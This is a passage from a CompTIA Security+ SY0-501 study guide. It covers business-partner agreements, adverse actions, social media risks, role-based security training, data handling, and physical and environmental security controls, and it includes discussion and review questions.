matters. For example, imagine that your company collects quite a bit of sensitive customer data as part of its
normal services. Their terms of service with you clearly say what you collect and specify your obligations to
keep that data private and secure, and so far it's been simple enough. But now you're adding a big new web
application, and part of that is contracting a high-capacity datacenter to host it along with your customer
database. You've also hired an external developer to customize and set up the application, and support it at
least through the initial rollout period. Both of these parties will have at least some access to data—even if
you trust them and have contracts with them, guaranteeing the privacy of your customers' data just got more
complicated.
To maintain security, you need to be aware of the new risks you face, and recalculate your security needs
based on these agreements. It isn't just a matter of whether the third parties are trustworthy: you need to know
if they're using comparable data security measures to your own, who has custody of which data at what time,
how it's going to be kept safe in transit, and how you're going to reassure worried customers about their
privacy.
When you enter in agreements that involve third parties, you need to take these risks into account.

Onboarding/Offboarding Just like adding employees, you need a process to add business partners to your
systems and data. They'll need to be securely given credentials, and you'll want to
be sure that your partners treat them with the same security any other account
holder would. Likewise, when a business agreement ends, there needs to be a
process for removal of credentials and return or destruction of data.
Data ownership It's important to keep it clear exactly who owns and does not own shared or hosted
data, as well as who has responsibility for maintaining backups. While the
contract should clearly specify the details, typically third parties do not own data
they host, use, or transport. This means they're not allowed to share or distribute it,
and must destroy their copies after the agreement ends. Some third-party
companies, especially consumer oriented cloud services might expect to have
ownership of data they host: be sure to read agreements carefully.
Data sharing Third parties that don't own data aren't allowed to share it, but it's harder to spot
unauthorized data sharing with third parties than it is on your own systems. Even
with trusted third parties, it's important to apply least privilege and need to know
principles, minimizing the chance of sensitive data falling into the wrong hands in
case they're compromised by an attacker.
Data security Before entering in an agreement, you need to make sure other parties' security
procedures meet the standards of your own, and vice-versa. Once the agreement
begins you still need to adhere to all security policies, and if necessary update
them to reflect the new interoperation agreement.
Privacy considerations Entering a third party agreement doesn't release you from obligations to protect
customer privacy, especially when it comes to PII or other legally protected
information. The contract, and your communications with the third party, should
stress their obligations to protect the data's privacy. NDAs are important contracts
in guaranteeing privacy.
Review processes Before finalizing a third party contract, you need to examine it alongside existing
contracts and regulations related to the affected data. For example, some
government or medical organizations may be forbidden from storing certain data
on cloud services. Separate from that, the agreement should have provisions for
mutual review processes and coordination guidelines, to make sure all parties are
keeping to the security agreements.

CompTIA Security+ Exam SY0-501 453


Chapter 10: Organizational security / Module A: Security policies

Adverse actions
It's common for businesses and government organizations to conduct credit checks, criminal background
checks, medical evaluations, or other research into someone's history before giving them access to financial
resources, valuable data, or other benefits. For instance you hire an employee or promote them to a position
where they'll handle sensitive data, it's generally a sound (and legal) practice to know whether they have a
criminal past or debts that mark them at high risk of compromising valuable assets. Similarly, you should
perform similar research of another business before a purchase or merger. Some such checks might even be
regulatory requirements as well as good business practice, but they have to be performed in accordance with
well-defined policies to be lawful and effective.

Exam Objective: CompTIA SY0-501 5.1.3.10


An adverse action is the legal term for any time a business performs such a check on an individual (or
sometimes another business) and denies the requested benefit - employment, promotion, credit, or anything
else it would have given them if the check came back clean. Adverse actions are subject to a variety of laws
and regulations, for example to prevent unfair discrimination in hiring and lending practices. In any situation
where your organization might take adverse actions, you need to implement policies that follow those
regulations. Areas to specify include:
 What checks can or must be performed in relation to what benefits
 Reporting requirements, both to the subject of the adverse action and to applicable regulatory bodies

• Exactly what must be reported and to whom


• How quickly the action must be reported

 Privacy requirements for performance or results of the background check


 Remedies the subject can pursue in order to dispute or correct check results

Social media risks


Social media is everywhere these days. You probably have accounts on multiple services, and odds are your
organization does as well. They're a wonderful tool for people to keep in touch, and for businesses to
communicate with their customers, but they're also full of security or public relations risks.

Exam Objective: CompTIA SY0-501 2.3.9.4, 2.3.9.5, 5.1.4


To begin with, consider any social media accounts actually associated with your company. Who has control of
them? It's a case where account sharing might actually make sense, for example if multiple people make
updates to the company Facebook page. A company social media account probably won't, or at least shouldn't
have, much in the way of sensitive information, but an inside or outside vandal who gets control of it could
damage your reputation. Even accidents by well-meaning employees can lead to publicity scandals: several
years ago, the official Red Cross Twitter account sent a tweet about plans to go drinking with friends, which
had been intended for an employee's personal account. Another time an airline responded to a customer
complaint with an inappropriate and offensive image, which had accidentally been copied and pasted from
another tweet. Both turned out to be more embarrassing than actually damaging, but they're a sign of the
mistakes that can happen.
Even personal social media accounts can be a concern to employers as well, for a few reasons.
 Employee use of social media from work can be time-consuming. If they're using company machines
and networks for access they could introduce malware as well.
 Social media sites often use single-sign on systems with shared credentials among multiple servers: for
example, there are many online services that let you sign on using your Facebook password. This can
potentially introduce risks of data leaks or phishing attacks.

454 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

 Users don't like to remember long lists of passwords, and this applies to personal as well as work
accounts. Many employees will use the same passwords for personal online accounts that they do for
work, allowing anyone who learns the former to guess the latter.
 Employee postings about work, or containing workplace photos, can reveal sensitive information about
business operations, security controls, or other things that can be useful to an attacker.
 Even personal matters in employee postings are commonly used in social engineering attacks. Personal
knowledge learned from a social media account is valuable for an attacker trying to build trust, and
information like someone's pet name or educational history can be used to guess weak passwords or
website security questions.
 Employee personal behaviors can be a liability for their employers: illegal or offensive behavior by an
employee can reflect badly on their company. especially when it's someone prominent in the
organization. If someone ends up in the news for online harassment, and the offending posts are
interspersed with ones from your office, it will at best look bad and at worst raise legal questions about
whether the company knew about the illegal behavior.

Closely related to social media is the use of personal email. It has most of the same problems of social media
use. Personal email is especially risky as a vector for malware when it's accessed on computers also used for
work. It's also very easy for employees to get in the habit of using a personal email account for business
purposes, or vice-versa.
Policies and guidelines are important in fixing all of these issues. Corporate accounts should be tightly
controlled, and policies should address both how employees can use social media during business hours, and
what sort of work-related information is permissible on social media. Employee training should also cover
how social media is used in social engineering. Just how much control an employer should have over the
personal lives, including social media activity, of employees is a privacy issue that's widely debated, so there
aren't clear policy standards. On the other hand, personal social media activity is already widely used by
employers: it's common for employers to use social media in the hiring process, looking for potential
problems in an applicant's public postings.

Discussion: Business agreements


1. What business agreements have you had to read or work with in the past?
Answers may vary, but most people have dealt with some sort of SLA.
2. How do cloud providers fit into secure business agreements?
Not only are they partners you need to have clear contracts with to define security responsibilities, they
also are often third parties who handle sensitive customer data directly or indirectly.
3. Look online for interconnection security agreement guidelines, and note their typical concerns.
Results may vary. One useful source is NIST Special Publication 800-47.
4. Look online for business partnership agreement templates, and note their typical contents.
Results may vary.

CompTIA Security+ Exam SY0-501 455


Chapter 10: Organizational security / Module A: Security policies

Assessment: Security policies


1. What policy document generally describes mutual goals between organizations? Choose the best
response.
 BPA
 ISA
 MOU
 SLA

2. Which policy is focused on preventing data loss? Choose the best response.
 AUP
 Clean desk policy
 Mandatory vacation
 Separation of duties

3. Experts agree that very demanding password policies are the best way to maintain security. True or false?
 True
 False

4. What are the benefits of a job rotation policy? Choose all that apply.
 Allows employees to discover each other's mistakes in multi-step processes
 Helps detect fraudulent activity over time
 Minimizes permissions given to any one employee
 Prevents data loss
 Trains employees more broadly

5. Your company has signed a BPA with a business partner. What most likely isn't a part of it? Choose the
best response.
 How liability is shared for a loss of shared assets
 Technical requirements for secured data connections between the two companies
 What happens to informational assets when the agreement is dissolved
 Who is responsible for maintaining informational assets

456 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module B: User training

Module B: User training


Policies, procedures, and guidelines are only useful if users actually follow them, and just posting them up
where everyone can see probably isn't good enough. For that, you need a training program informing
employees of their roles and responsibilities in keeping the organization secure. Further, security training
needs to be an ongoing process: not only do you need to include it in employee orientation and when policies
or procedures change, you need to maintain ongoing communication between management, administrators,
and users regarding security issues.
You will learn:
 About role-based training
 How to train employees in handling sensitive data
 How to apply training as an ongoing process

Role-based training
Not all employees need to know all the details of the organization's security policies and goals. As important
as it is that management knows having up-to-date firewalls is important for the network, they don't really need
or want a presentation on how to configure one. Social engineering attacks can affect anyone in the
organization, but the sort likely encountered by security guards and that by call center workers are likely to be
somewhat different. For that matter, some security procedures might be restricted information distributed on a
need-to-know basis. Role-based training programs work by tailoring training content to classes of users based
on their workplace duties and expected technical expertise.

Exam Objective: CompTIA SY0-501 1.6.8, 3.1.3.3, 5.1.3.7


Some roles found in a typical organization include the following:

End users Any user needs to know about common threats and how to protect against them.
End user training typically focuses on topics like maintaining password security,
avoiding malware and suspicious links, the importance of physical security, and
important regulatory compliance issues for the business type.
Customer-facing Employees who deal regularly with customers, or even other outside personnel
employees like business partners, delivery workers, and so on need additional training in
recognizing social engineering attacks and protecting the organization's reputation.
Privileged users Users with any sort of elevated privileges have more capability to inadvertently do
damage than end users, but that doesn't mean they're more technically savvy or
aware about security. They need to be made aware of the extra permissions they've
been given, what responsibilities come with them, and the importance of not
sharing their credentials with other users.
Administrators Network administrators and system owners need to know about technical threats
facing networks and systems, and how to configure and maintain the security
solutions used to contain those threats. Administrators need to be regularly kept
abreast of network changes and evolving threats, and to have detailed system
documentation available at all times.
Incident response teams Personnel who respond to security incidents need to know detailed procedures
related to their specific duties. Security guards need to know how to respond to
physical threats, workstation troubleshooters need to know how to safely remove
malware, and so on. At least someone on every incident response team needs to
know forensics procedures and related legal requirements.

CompTIA Security+ Exam SY0-501 457


Chapter 10: Organizational security / Module B: User training

Management Executives and other management have a very different security perspective from
most users. Management needs to have a high-level understanding of security,
focused on the assets of the organization and general classes of threat that it faces.
They don't need to know all the details of security controls, but they need to know
why they are in place and what could compromise them. Executives must also be
aware of some specific threats, such as whaling attacks.

It's important to document the training process, and collect performance metrics after. To make sure all
necessary training is given, ensure your training plan lists all training requirements for each employee, and
tracks whether each has been met. Afterward, you should use tests or simulations to verify that the training
was successful.

Handling data
Users should be educated about how to handle data securely throughout its whole life cycle. Role-based
training should focus on the types of data they will handle in their normal duties, but in general they should be
aware of the importance of recognizing sensitive data and acting appropriately. Exactly what training users
should have depends on your organization's policies, but typically users should know the following:

 Data should always be classified according to its nature or sensitivity level.


• Sensitive data should always be clearly labeled or otherwise recognizable as such.
• Data should be stored only in appropriate locations for its nature and sensitivity.
• Users should have both permission and need to access sensitive data, whether technically able to or
not.
 Some types of data require special handling for contractual or regulatory reasons. This can restrict who
can view it, how it is stored and secured, and what can be done with it, so the specific details should be
covered as role-based training.
• Personally identifiable information (PII) is subject to special legal regulations, such as HIPAA
governing medical patient data in the US.
• Payment and financial data is governed by industry and legal regulations as well. For example, credit
card data must be stored by PCI-DSS standards.
• Customer and partner data must be handled in compliance with existing privacy and sharing
agreements.
 Data that isn't securely stored on a server needs special handling.
• Sensitive data shouldn't be sent over the network by insecure means. For non-technical users
guidelines might be allowed or forbidden applications, while for network administrators it might be
specific encryption standards.
• Sensitive data should never be shared outside of permitted channels. In the workplace, this includes a
clean desk policy for sensitive information.
• Mobile devices and removable storage media holding sensitive data should be encrypted and
appropriately labeled.
• Data should only be taken from the workplace as permitted, and the user must be responsible for its
physical security.
 Data and media should be disposed of appropriately to avoid dumpster diving or other scavenging
techniques.

458 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module B: User training

Ongoing training
Training is an ongoing process. Not only will your organization's structure and surrounding threats change
over time, but after any sort of security incident you should consider remedial training and review your
existing training processes to see how they could have prevented it. Likewise, audits and employee
evaluations should always examine compliance with security policies, laws, and best practices.

Exam Objective: CompTIA SY0-501 5.1.3.8


Very often, maintaining security is a matter of looking behind at what's habitually done wrong, and looking
for ways to encourage good practices while discouraging risky behavior. Often, employees are just looking
for shortcuts that make their work easier, and need reminded of risks when their vigilance lapses. Sometimes
the solution is repeating and enforcing training. Other problems are better fixed by evaluating outdated or
flawed policies and training procedures.
 Users are prone to choose insecure passwords. When strong passwords are enforced, they're prone to
reuse them, write them down in insecure locations, or constantly forget them. If maintaining
sufficiently secure passwords is difficult for users, you might need to work out different policies or
authentication controls.
 Similarly, users called from one task to another frequently leave data exposed: accounts still logged in,
documents left lying about, and so on. Clean desk policies and related training can help if this becomes
a problem.
 Recreational programs and websites on company networks are popular when they're not completely
forbidden, and sometimes even when they are. Users may use social media services excessively or
inappropriately, and P2P or media streaming services can hurt network performance or be used to
illegally distribute copyrighted materials. When these become a problem you should either remind
users of existing policies, or consider adding new controls. Even if you just block an offending
application, you need to explain why it was blocked to keep users from just trying to work around it.
 Personal mobile devices are only becoming more central in user's lives. If your organization doesn't
have a clearly defined mobile policy, or if restrictions on personal device use are increasingly strained
or violated by changing user behaviors, you either need to increase training and enforcement, or alter
the policy to keep device use secure.
 Users tend to be helpful to each other, and anyone not perceived as threatening. This is a social
engineering vulnerability. If users frequently hold doors for tailgaters, for example, you might need to
add more training or even physical controls like mantraps.
 Users easily get in the habit of answering legitimate-seeming questions or following legitimate-looking
links. Scams and phishing attempts often follow trends or are used on multiple targets throughout an
organization, so responding to an isolated incident with a company-wide bulletin can prevent
recurrence.
 Technicians are very prone to disable security controls as part of troubleshooting or optimization
processes, and then forgetting to turn them back on. You might need to stress the importance of
enabling security controls after maintenance.

Another way of maintaining security is looking ahead and watching out for new threats, then informing others
about them. Security administrators in particular, but users in general, should watch for new threat alerts or
unfamiliar attacks, and notify the rest of the organization of any new risks. In particular, it's important to
monitor for new viruses that systems might not be adequately protected against, or any other sort of zero-day
exploit which is newly discovered but not yet patched.

CompTIA Security+ Exam SY0-501 459


Chapter 10: Organizational security / Module B: User training

Discussion: User training


1. Identify job roles within your organization, and which specific fields of security training are important for
each job.
Answers may vary. For example, technical personnel need to know detailed security procedures for the
systems they manage, while customer-facing personnel need extra training on dealing with social
engineering.
2. Of your present or past jobs, which provided clear training on how to securely handle sensitive data? If
not, what was lacking?
Answers may vary.
3. Do any aspects of your organization's security policy seem out of date due to changes in technology or
user behavior?
Answers may vary.

Assessment: User training


1. What kind of security training is most important for a company executive? Choose the best response.
 Identifying malware symptoms
 Overall awareness of the organization's assets and threats to them
 Recognizing social engineering attacks
 Regular updates on evolving network threats

2. What standards do you need to use when handling credit card data? Choose the best response.
 HIPAA
 NIST
 PCI-DSS
 PKI

3. Users should have both permission and need to access sensitive data, whether technically able to or not.
True or false?
 True
 False

4. What kind of employee is most likely to need extra training about social engineering attacks? Choose the
best response.
 Department manager
 Maintenance technician
 Network administrator
 Receptionist

460 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

Module C: Physical security and safety


When discussing information security it's common to focus on technical threats and controls, with an aside of
social engineering risks. These are important topics, but never forget that the lowest tech threat, that of
someone just walking in and stealing or destroying assets, hasn't gone away. In fact, it's a commonly cited rule
of thumb that once an attacker gets physical access to a system, compromising any digital security is just a
matter of time. Closely aligned with physical security are environmental controls used to prevent fires and
protect sensitive equipment, and safety controls used to protect human assets from harm.
You will learn:
 About location and facility constraints on physical security
 About surveillance systems
 How to secure entryways and equipment
 How to protect and personnel with environmental controls
 About fire suppression systems

Physical access control


One reason it's easy for people not to think of information security and physical security in the same terms is
that they'll think of the former in terms of technical standards and network activities that aren't part of the
"real world", and the second as a low-tech field that, important or not, is more about protecting people and
physical valuables than data. In truth they're part of a unified whole, and in principle, they operate the same
way. Physical controls extend beyond computers and policy statements and into the physical facilities of your
organizations, and can be categorized in similar ways.
Like a network, a physical facility is likely to use defense in depth, by means of multiple security zones
separated by active and passive access controls, and subject to different security restrictions. In a typical
office building there might be some security controls for the parking lot and grounds, stricter ones for the
internal office space, and most of all for the server room or other particularly valuable areas.

CompTIA Security+ Exam SY0-501 461


Chapter 10: Organizational security / Module C: Physical security and safety

Physical controls can be classified like any other type. A locked door is a preventive or deterrent control that
blocks entry, while a security camera is a detective control that simply records who passes. A security guard
can do both, but as a human element can be vulnerable to social engineering and lapses of attention. Similarly,
a security alarm is designed to protect against human attackers, while a smoke detector is intended to detect
"equipment malfunction" in the form of a fire. User credentials and authentication are important in physical
security, just they're more likely to be a key or ID badge than a password or digital certificate.
Just like in any other field of security, stronger physical security isn't always better—you need to tune it to
your actual needs, and implement it carefully. Access controls that are too burdensome or inconvenient for
legitimate users will hurt performance or encourage employees to creatively bypass them. Improperly
implemented physical controls can even be dangerous. For instance, if you're worried about unauthorized
visitors being let in through a back door, you might consider locking it so that it can't be opened from either
side without a key held only by the facilities manager. The problem is, that could turn deadly if it's the only
fire exit from that part of the building.

Facility and location concerns


What measures you need to take for safety and security aren't defined only by your organization's assets and
risks, but by your facility's construction and location. If your organization is having its own facility
constructed you might have a great deal of freedom in making sure the whole site is safe and easily secured;
likewise, if you're buying or renting an existing one you can look for what best suits your needs. If you're
evaluating new physical security and safety standards for an existing facility, you're likely to be considerably
more restrained—unlike a network there are no nifty virtualization tricks that will let you avoid a complex
remodeling project.

Exam Objective: CompTIA SY0-501 3.9.1, 3.9.2, 3.9.3, 3.9.14


The location of your facility has a lot of bearing on physical security requirements, both from human and
natural causes, so you should research the area before moving into a new facility.
 High crime and vandalism rates can lead to damage or theft of physical assets, or even dangers to your
employees that you'll need to address.
 A location at risk of floods, storms, earthquakes, or other natural disasters will heighten the need for
disaster planning policies.
 Unreliable utility services such as electricity or telecommunications access will increase the need for
backup systems.
 Emergency response times can affect security and safety, especially for remote locations. If police, fire,
and ambulance services can't reach the facility quickly, both lives and property are at greater risk in
case of emergency.

The facility's physical construction and layout is critical to security: if nothing else, walls and entry points are
the most fundamental types of passive access controls, and the hardest to modify later.

462 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

 Perimeter fences or walls can be used to control how people enter the grounds themselves, but height
and construction method determine how much security they provide.

• A 3-4 foot barrier of any sort will discourage casual intruders, but not those willing to climb. High
security fences are typically 8 feet or more, and topped with barbed wire or other measures to
discourage climbing.
• To prevent intruders going under or through a fence, make sure it's sturdily constructed, hard to
disassemble, and has secure bottom rails or buried chain links.
• To prevent intruders from using vehicles to crash through barriers, install a fence with a K-rating
appropriate to your needs. K-ratings are a crash test standard designed by the US Department of
State: A K12 fence can stop a 15,000 lb. truck traveling at 50 mph.
• Sensors or cameras can detect someone trying to breach a security fence.
• Keep high grass and trees clear of the fence to aid visibility.
• Make sure that fences and gates don't block emergency access or escape routes.

 Barricades are useful for controlling vehicle traffic or directing crowds, but shouldn't be considered a
secure protection against individual intruders.

CompTIA Security+ Exam SY0-501 463


Chapter 10: Organizational security / Module C: Physical security and safety

 Signs marking restricted areas are a simple deterrent control against casual or accidental intruders.
 All doors should be easily secured, and allow safe entry and exit. Emergency exits should never be
blocked or locked from the inside: instead use door alarms that signal when they're opened.
 Ensure that normal entrances can't be simply bypassed, especially to protect against after-hours
burglary.

• Make sure that windows can't be easily opened or broken to force entry. Even upper story windows
accessible from fire escapes are at risk, but don't let security block the escape route.
• Ensure that internal walls bordering secure areas go from the true floor to the true ceiling. If a wall
can be bypassed by going through the crawl space above a drop ceiling, or below a raised floor,
determined intruders can bypass a locked door or security checkpoint.
• Highly secure areas need to be protected by sturdy or reinforced walls. A drywall partition is easy to
simply smash through.
• Ventilation ducts and utility tunnels might not be the same risk in real life that they are in the
movies, but if a person can fit through one it needs to be documented and secured just like if it were
a hallway.

 Visibility and accessibility can benefit security and safety alike.

• External areas like entrances, sidewalks, parking lots, and garages should all be visible and well-lit.
Ample (but not blinding) lighting will aid surveillance, deter intruders, and protect from accidents.
• Emergency escape routes within the building should be unobstructed, clearly marked and have
battery-powered lighting to ensure safe evacuation during a power outage.

Surveillance systems
In any security system, detective controls are essential. In physical security, this role is filled by cameras and
other surveillance systems that detect and report on intrusion. Surveillance systems don't just allow you to
actively respond to security incidents, they can also document unauthorized access and help identify intruders
after the fact.

Exam Objective: CompTIA SY0-501 3.9.4, 3.9.5, 3.9.19, 3.9.20, 3.9.23


Video cameras, also known as closed-circuit television (CCTV) are one of the most popular forms of
surveillance, and advances in digital video technology have made IP-based cameras and security video
storage simple and inexpensive to deploy. Most simply, you can simply place cameras at any entrance or
location you want to monitor; depending on your needs, you might need additional features.

464 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

Many modern cameras include infrared LEDs for night vision

 Night-vision cameras can record activities in low-light conditions where normal cameras don't. Some
simply are sensitive to very low levels of light. Others are sensitive to near-infrared wavelengths just
outside of human vision, and contain a matching infrared light to invisibly illuminate the area. Both
generally only show black and white output.
 Wireless cameras using Wi-Fi or other technology can be easily placed where wiring would be
inconvenient.
 Often the visible presence of a security camera is valued as a deterrent, but hidden cameras are
preferred for some purposes, for example uncovering evidence of employee theft. Hidden cameras
should never be placed where people have a reasonable expectation of privacy, and should only be used
in compliance with local laws and employee or customer agreements.
 Motion-sensitive cameras can be set to record only when they detect motion in their field of view.
They're useful in low-traffic areas, where recording full time might waste network bandwidth or
storage space.

Note: Like any other network device, IP-based cameras need to be properly secured so that not just
anyone can log in and view your security footage. Keep their firmware updated, and use strong
passwords and encryption.
Other security systems use motion detection or other sensors to detect intrusion, then trigger an alarm.
Depending on the system, the alarm may be very audible, or silent and directed only to security personnel or
emergency services.

Motion sensor Detects motion using active or passive infrared sensors.


Window/Door sensor Uses an electrical circuit built into a door or window, and maintained by a special
switch such as a pair of magnets. When the window or door opens, the circuit is
broken and the alarm is triggered. Similar circuits can be used to detect when a
fence is cut.
Pressure sensor Detects pressure from someone walking through a protected area. Usually built
into a pressure mat on the floor, such as an apparent rug or doormat, but can be
buried under a floor or soil.
Glass break sensor Detects the sound or vibration of breaking glass, such as a window it's installed in.
Environmental sensors Detect heat, cold, moisture, or humidity. Generally used to protect sensitive
equipment from environmental extremes rather than to stop intruders, but often
linked into the same system.

Whatever kind of surveillance systems you use, location is everything. It's not generally practical to cover
absolutely everything, but you should focus on likely points of entry, valuable assets, and areas an intruder
will have trouble avoiding. Plan surveillance coverage to minimize blind spots or ways someone could sneak
around cameras and sensors.
Finally, don't forget that people are the most versatile, if not most reliable, surveillance system. For high
security environments, security guards are essential: they can monitor cameras and sensors, notice oddities on

CompTIA Security+ Exam SY0-501 465


Chapter 10: Organizational security / Module C: Physical security and safety

their own that an automated system might miss, and provide a strong deterrent by their visible presence.
During business hours, aware employees should also be trained to recognize unauthorized visitors or signs of
intrusion.

Secure entryways
The whole point of walls, fences, and surveillance systems is to make sure that no one can pass from one
security zone to another undetected. Past that, the only way to pass between them should be a secure
entryway, whether it's a locked door, a reception desk, or a security checkpoint with armed guards. The more
entryways you need to protect, the harder security is to maintain, so when planning a facility layout you
should work to minimize entry into high security areas.

Exam Objective: CompTIA SY0-501 3.9.10, 3.9.11, 3.9.12, 3.9.13, 3.9.15, 3.9.21, 3.9.23
The most popular security method is still a locked door, but there are a lot of ways today that a door can be
secured. A given entry might use multiple methods.

Conventional locks

Standard door locks are easy to pick, but higher security models use tighter tolerances
and extra security features to make it more difficult to bypass. Even those can still be
picked, but it will take more time and skill. Spring-bolt latches built into doorknobs
aren't very secure, so make sure to use deadbolts on any door locked as more than a
courtesy. Remember that there should be no locked doors on an emergency escape
route, so doors locking from both sides can be a problem.

Note: Key management is every bit as essential with conventional


locks as it is with cryptography. If you don't know who has keys for a
given lock, and if you're not reasonably certain no one has made
unauthorized duplicates, you can't trust that it will provide any real
security.

466 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

Electronic locks

In modern facilities, electronic locks give features and security that conventional ones
cannot. Most obviously, they can accept a variety of credentials depending on the
lock's input mechanism.

 Numeric passcodes
 Embedded chips or magnetic strips in ID badges
 Electronic tokens read by a proximity sensor
 Fingerprints or other biometric information

Note: Unlike conventional locks, electronic locks won't work without


power, whether AC or battery backup. It's important to know whether
an electronic lock is fail-safe/fail-open, meaning that it unlocks when
power is cut; or fail-secure/fail-closed, meaning that it locks when
power is cut. Fail-secure locks are more secure, but can trap people in
an emergency.
Guards In addition to traditional security guards checking badges or other credentials
manually, human security can be as simple as a welcome desk worker seated before a
door, or an electronic lock that's opened remotely by someone manning a camera or
intercom.
Mantrap High-security areas can use two doors in a row to create a small room, or "trap", that
can only admit one person at a time. Since only one door can open at a time, and each
person entering must separately present credentials it discourages tailgating. More
secure mantraps use pressure sensors or guards to make sure that users don't try to
bypass the system.
Logging Electronic locks and guards can easily be made to log everyone who passes through a
doorway, and check them against an access list of allowed personnel. Even without
locks, cameras or even sign-in sheets can monitor passage.

CompTIA Security+ Exam SY0-501 467


Chapter 10: Organizational security / Module C: Physical security and safety

Securing equipment
Don't think of physical security as just a matter of perimeters and checkpoints. It's often important to closely
monitor specific equipment and resources, especially valuable equipment in low-security areas, or critical
assets wherever they might be.

Exam Objective: CompTIA SY0-501 3.9.6, 3.9.7, 3.9.8, 3.9.17

 While it's easy to remember to keep server rooms or file rooms tightly secured, it can be even easier for
an attacker to gain unobserved access from a telecommunications closet holding servers or central
connections. Keep access to network hardware tightly restricted.
 Use hardware locks or locked cabinets to protect easily stolen equipment like workstations and lone
servers, especially in low security areas.
 Especially valuable items or data and documentation that doesn't need online accessibility can be stored
in a locked safe. Choose fire resistant models for additional protection in case of disaster.
 Secure physical access to wireless access points. This can be a particular challenge since WAP antennas
don't work well inside a locked cabinet.
 Watch for where network outlets or even cables can be targeted by an attacker. Protected distribution
systems used to carry unencrypted classified data rely on physical security throughout their length,
wherever they might lead. Commonly they run through pipes to restrict physical access., and connect
only to secured terminals.
 Watch for signs of intrusion or social engineering attacks. Where security personnel are unaware, it's
easy for someone pretending to be IT to just walk off with entire computers.

Discussion: Physical security


1. Does your workplace have clearly defined security zones?
Answers may vary.
2. What physical security controls are employed at your workplace?
At the least most businesses have locks and alarms.
3. Are computers and network equipment in your workplace physically secured?
Answers may vary.
4. Create a short list of improvements you could make to physical security in your workplace. For each, note
whether they would be easy to deploy, or require major changes to the facility.
Answers may vary.

Environmental controls
Physical security has a lot of overlap with safety and overall facilities management. Part of this is managing
and monitoring the environmental controls used to protect sensitive equipment and other physical assets.
Server rooms in particular need strong environmental controls to function, but it hardly stops there. Common
environmental controls include:
 Heating, Ventilation, and Air Conditioning (HVAC)
 Electromagnetic shielding
 Fire suppression

468 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

HVAC systems
Modern office buildings tend to have HVAC systems that provide climate control throughout the entire
building. A properly functioning HVAC system provides clean and fresh air, and moderates both temperature
and humidity to comfortable levels. In today's workplace, HVAC isn't just a matter of human comfort:
electronic equipment can be very sensitive to extremes of temperature and humidity. Almost everyone knows
computers can overheat and are damaged by water, but many neglect that low temperatures can make some
electronics unreliable or short-lived, and low humidity increases risk of electrostatic discharge (ESD) that can
damage sensitive components.

Exam Objective: CompTIA SY0-501 3.9.16.1,3.9.16.2


The recommended environmental range for a given piece of electronic equipment is probably hidden in the
documentation or label fine print somewhere, but mostly it's not far from ranges that are comfortable for
humans. Cisco's recommendation for data center equipment is a temperature range of 64.4°-80.6°F (18°-
27°C), with 40%-60% relative humidity.
Electronics and humans needing similar climate control settings is misleading, since HVAC controls meant
for humans can have serious problems keeping computers safe. Computers, especially clustered in server
rooms and cabinets, can generate a lot of heat that ordinary systems won't dissipate quickly enough.
Additionally, many HVAC systems in office spaces are designed to turn themselves down after hours—
equipment left running 24/7 needs constant environmental controls as well. Usually it's best to use a separate,
dedicated HVAC system for areas where sensitive electronics are stored.
Wherever you have sensitive equipment, you should be aware of its environmental needs and add proper
controls to make sure it's kept in a safe range. It's a good idea to place environmental monitors with clusters of
sensitive or power-hungry equipment in particular. Isolated but critical components should be monitored as
well, especially if they're in "unusual" locations like basements or attics with different climate conditions than
office spaces.
Air flow is a particular concern: without it, electronics readily overheat. It's most pronounced in server rooms
and data centers, which use tricks like cold aisles between rows of equipment to deliver cool air through the
room alternating with hot aisles that carry hot air to the return vent. Servers are then placed back-to-back, so
the air flow passes correctly through each system.

Even with fairly rugged electronics, rapid temperature changes or sharp temperature gradients are dangerous
because they can cause condensation that will corrode or short out electrical equipment. Equipment or
connectors alongside unshielded outside walls, cold water pipes, or other cool surfaces are at highest risk of
condensation damage.

CompTIA Security+ Exam SY0-501 469


Chapter 10: Organizational security / Module C: Physical security and safety

EMI shielding
Electrical currents, especially high-frequency, low-power signals such as those used in data networks, are
subject to noise from electromagnetic sources in their environment, such as radio transmitters, electrical
motors, or power cables. They also generate the same sort of noise, and can interfere with other equipment.
This is called Electromagnetic interference (EMI). EMI is actually an electromagnetic signal, and when it
occurs on the frequencies used by radio equipment, it's also called radio frequency interference (RFI).

Exam Objective: CompTIA SY0-501 3.3.1.8, 3.9.11

EMI can cause all sorts of problems: it can hurt network performance by causing line noise, overload devices,
or even allow an attacker to eavesdrop on wired communications or display devices by the interference they
generate. RFI is a prime cause of static or other noise in radio communications, whether AM radio, cell
phones, Wi-Fi, or others. It doesn't help that many radio devices use similar frequencies, and that electrical
sources typically affect devices on a wide range of frequencies.
More severe than EMI is a electromagnetic pulse (EMP) generated by a brief but powerful surge of
electromagnetic radiation, such as a lightning strike, nuclear weapon, or theoretically by a specially designed
but non-nuclear "e-bomb." Even ordinary electrostatic discharge is a very small and local EMP. Just like with
EMI, unprotected wires and circuits behave like an antenna in proximity to an EMP, but instead of just
interfering the EMP can do permanent damage to hardware. Fortunately, all known sources of EMP are either
rare, short in range, or both.
Protecting against EMI is important for both performance and security. For performance, it's important to
watch for EMI when stringing cables or placing wireless networks. Electric motors, microwave emitters,
HVAC equipment, and other industrial devices can be particularly potent interference sources. When
avoidance isn't an option, shielding is effective: grounded metal enclosures are particularly good at protecting
equipment against interference and eavesdroppers alike. You can protect wired networks by using shielded
cables, or run them through steel conduits if necessary. Server rooms or other equipment that is sensitive to or
generates EMI can be enclosed in a faraday cage, typically a fine wire mesh that is grounded and completely
surrounds the hardware.
Using EMI alone to eavesdrop requires specialized equipment, so it's mostly a concern for high security
facilities. There are products and standards designed to provide EMI security. For instance, the TEMPEST
anti-surveillance standards used by the NSA and NATO define ways to shield equipment against
eavesdropping via EMI, vibration, and other means. While the full standards are classified, the non-classified
elements have been used and applied by non-government security experts and equipment vendors.

470 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

Fire suppression
Fire is a risk in any building, no matter how you work to prevent it. Electronic equipment uses electricity and
